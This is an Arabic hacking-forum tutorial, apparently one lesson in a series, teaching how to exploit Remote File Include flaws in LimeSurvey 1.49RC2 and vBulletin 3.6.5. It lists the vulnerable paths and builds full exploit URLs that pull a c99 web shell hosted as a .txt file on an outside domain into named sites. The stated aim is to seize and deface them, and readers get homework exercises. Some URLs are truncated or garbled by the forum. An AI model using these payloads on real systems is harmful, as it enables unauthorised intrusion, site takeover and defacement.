بسم الله الرحمن الرحيم
كيف الحال يا شباب عساكم بخير ان شاء الله
يا طويلين العمر عرفنا وش هو السيرفر وعرفنا وش هو الموقع
الحين واحد فيكم يسأل سؤال وجيه
حنا نبي موقع على السيرفر ليش تقول شيل عالسيرفر ؟؟
الجواب : لأن يمكن نقدر نرفع الشيل في مجلد الموقع المستهدف
اللي هو
كود PHP:
/home/ksa/public_html
ويمكن ما نقدر عليه
لذلك نرفعه بأي منطقة ثانية على السيرفر اهم شي انه بنفس جهاز الكمبيوتر
كيييييييييييييييييف ؟؟؟
في عدة طرق انا راح اشرح اليوم طريقة
ام الطرق الثانية راح تكون في درس منفصل بإذن الله
الطريقة اللي راح اشرحها الحين وهي عن طريق [ الثغرات ]
يعني نرفع شيل من خلال ثغره
طبعاً الثغرات أنواع كثيره ولازم الواحد يتعمق فيها لكن دورتنا ما راح اشرح الثغرات كلها
راح اشرح اسهل نوع من انواع الثغرات ويأدي الغرض اللي نبيه ..
وهو ثغرات الـ File Include ( الفايل انكلود ) أو بالعربي ادراج ملف
يمكننا البحث عن الثغرات في مواقع الحماية وانا انصح بهذي المواقع
www.milw0rm.comwww.securityreason.comلأن البحث عن الثغرات فيها بسيط وهي من اقوى المواقع في نفس الوقت
طبعاً انا راح اشرح كيف يتم استغلال ثغرات الفايل انكلود
نختار ثغرة من الميل ورم مثلاً
هذي الثغره
http://www.milw0rm.com/exploits/4156تعالوا نطلع عليها
نشوف هالأشياء
فيها اسم المكتشف ووو .. لكن شوفوا هالخانات
كود PHP:
## Script site :
www.limesurvey.org## Script name : LimeSurvey (PHPSurveyor)
## Version : 1.49RC2
Script site = موقع مبرمج السكريبت
Script name = اسم السكربت المصاب
Version = الاصدار المصاب
طيب واحد يقول لنا يا بو عابد وش هو السكريبت ؟
السكريبت هو برنامج مبرمج بلغة الـ php مثل سكربت المنتدى وسكربت البطاقات .. الخ
الحين الثغره اللي عرضتها فوق يقول لنا في سكريبت اسمه LimeSurvey فيه ثغرة فايل انكلود
يعني نقدر ندرج من خلالها شيل .. او بالأصح اي موقع مركب هالسكريبت نقدر نرفع فيه شيل
تعالوا نكمل نشوف الثغره
نشوف هالخانه
كود PHP:
## Type : RFI(Remote File Include)
Type = النوع
مثل ماهوب ظاهر لنا ريموت فايل انكلود ( يعني ادراج ملف عن بعد )
واختصارها RFI وهي أول حرف من كلمة كلمة
المهم عرفنا انها فايل انكلود اتركوا كل الكلام لأنه ما يفيدنا
اهم شي في الثغره نعرفه
هو
1- اسم السكريبت المصاب . ( عرفنا في ثغرتنا انه اسم السكريبت المصاب هو LimeSurvey )
2- الاصدار المصاب . ( عرفنا في ثغرتنا فوق ان الاصدار المصاب هو 1.49RC2 )
3- نوع الثغره . ( عرفنا فوق ان الثغرات اللي حنا نشرح عليها فايل انكلود أي ثغرات ثانية استغلالها مختلف )
4- الاستغلال .
الحين عرفنا كل الأنواع أين الاستغلال
تعالوا نرجع لصفحة الثغره هنا
http://www.milw0rm.com/exploits/4156ابحثوا عن عبارة Exploit وتعني ( الاستغلال )
انا لقيتها
كود PHP:
## Exploit :
نلاحظ ان فيه اكثر من استغلال
وهذي هي الاستغلالات
كود PHP:
## /admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
## /admin/classes/pear/OLE/PPS/Root.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[shell]
## /admin/classes/pear/OLE/PPS.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[shell]
ناخذ استغلال من الاستغلالات
/admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
تعالوا نحلل الاستغلال هذا
admin = مجلد
classes = مجلد آخر
pear = مجلد ثاني آخر
OLE = مجلد ثالث آخر
PPS = مجلد رابع آخر .. يا ليل البعارين
File.php = الملف المصاب
تعالوا نترجم الاستغلال
يقول لك الاستغلال ادخل مجلد admin داخله بتلقى مجلد classes ادخله وبتلقى داخله مجلد ثاني pear ادخله وداخله بتلقى مجلد ثالث OLE
ادخله وداخله بتلقى مجلد PPS داخل هالمجلد بتلقى ملف File.php وهو الملف المصاب
طيب ترجمنا الاستغلال ترى ما نحتاج الترجمه بس عشان تفهمون لا أكثر ولا أقل
لو جينا وقلنا هذا موقع
http://www.osoud.net/vb/,]سكريبت LimeSurvey اصداره 1.49RC2 راكب عليه هنا
[http://www.osoud.net/vb/]
وحنا عندنا ثغرة نرفع الشيل تعالوا نستغلها
بما ان السكريبت داخل مجلد ls في الموقع
راح يكون تطبيقنا كذا
كود PHP:
http://www.vbhacker.net/ls/admin/cla...e.php?homedir=[shell] http://www.vbhacker.net/ls/admin/cla...e.php?homedir=[shell] http://www.vbhacker.net/ls/admin/cla...e.php?homedir=[shell] www. vhacker.net
/ls/admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
http://www.osoud.net/vbls/admin/clas...e.php?homedir=[shell] [urlhttp://www.osoud.net/vb/admin/classes/pear/OLE/PPS/File.php?homedir=[/url][shell]
http://www.osoud.net/vb/admin/classe...e.php?homedir=[shell] هذا هو الاستغلال
الحين كل اللي علينا نستبدل عبارة
[shell]
برابط شيل مرفوع على اي موقع بامتداد txt
لو انا مثلاً رافع شيل على موقع
بامتداد txt
كمثال شوف
http://younes.by.ru/c99.txtهذا شيل c99 مرفوع على موقع
لاحظوا ان امتداده هو
txt
وليس
php
وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب
وليس قراءة الملف في الموقع اللي رافعين عليه الشيل
الاستغلال بيكون كذا
كود PHP:
http://www.hack15.com/ls/admin/class...by.ru/c99.txt? لاتنسوا عند الادراج تضعون علامة الاستفاهم في نهاية الاستغلال
تعالوا نترجم الأمر اللي سويناه
لو الحين فتحنا الصفحة هذي
كود PHP:
http://www.hack15.com/ls/admin/class...by.ru/c99.txt? بيعرض لنا الشيل اللي حنا رافعينه على موقع ثاني ولكن بينعرض على موقع منظمة الاختراق العالمية
تعالوا نحلل الاستغلال ثاني
حنا الحين من خلال ثغرة في سكريبت مرفوع على موقع منظمة الاختراق العالمية
أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة
http://younes.by.ru/c99.txtداخل منظمة الاختراق العالمية
وقراءتها على سيرفر منظمةhttp://www.osoud.net/vb/
يعني انه بيسحب أكواد الشيل ويشغله على منظمة الاختراق العالمية
وبكذا بيعرض لنا الشيل
http://www.osoud.net/vb/ة وحنا في الحقيقه ما رفعناه على الموقع كل اللي سويناه عرض على الموقع
ونقدر نتحكم بالموقع كامل من خلال هالطريقه .. وكذلك لو كان في مجلد مصرح 777 تقدر ترفع فيه الشيل على المواقع او صفحتك او اي شي
الحين نجي لدرسنا السابق وهو الصلاحيات الحين لو عرضنا الشيل على
http://www.osoud.net/vb/وطلعت لنا الصلاحية = osoud.net/vbهذا يعني ان صلاحيتنا يوزر عالموقع يعني نقدر نتحكم في مجلد منظمة الاختراق العالمية
يعني ما يحتاج تصريح 777 تقدر ترفع اندكسك بالصفحة الرئيسية وتلعب بالموقع كامل لعب لأن صلاحيتك حالياً هي يوزر يعني مالك الموقع
وبكذا نكون انتهينا من شرح استغلال ثغرات الفايل انكلود والحمد لله
قبل ما اطلع من الدرس حاب اعطيكم هدية بسيطه
===============================================
جاني واحد من الشباب وعطاني هالثغره
ثغرتين فايل انكلود تساعدك لرفع شل على نسخة ال 3.6.5 vb
الثغره مجربه علي اكثر من منتدي اجنبي
كود PHP:
vb/includes/functions_cron.php?nextitem=shell
vb/includes/functions.php?classfile=shell
vb/includes/functions_forumdisplay.php?specialtemplates= shell
مثال على الاستغلال :-
[http://www.osoud.net/vbincludes/fu...cialtemplates=[/url] shell
لا تنسى استبدال shell برابط شيل txt ولاتنسى علامة الاستفاهم واحلى اختراق
==================================================
تعالوا ما انتهينا يا حلوين .. هع مافي راحة
حنا شرحنا فوق الثغره وانا شرحت استغلال واحد من الاستغلالات
الحين راع اعطي أمثلة مواقع ( وهمية )
هذي مواقع نفترض انها مركبة السكريبت والسكريبت فيها موجود بمجلد ss
هذي هي
www.soper.com/sswww.ksa.com/sswww.sos.com/sswww.7looo.com/ssابيكم ترجعون تشوفون الاستغلالات فوق وتستغلونها على هذي المواقع
وكل استغلال مختلف عن الثاني يعني لا يجي واحد يطبق لي نفس الاستغلال غلى المواقع كلها
ويكون الاستغلال كامل مع الشيل وكل شي ..
مثال على استغلال كامل
كود PHP:
http://www.hack15.com/ls/admin/class...by.ru/c99.txt? B @ r 0 n E
BaRoNe.HaCkEr@W.cN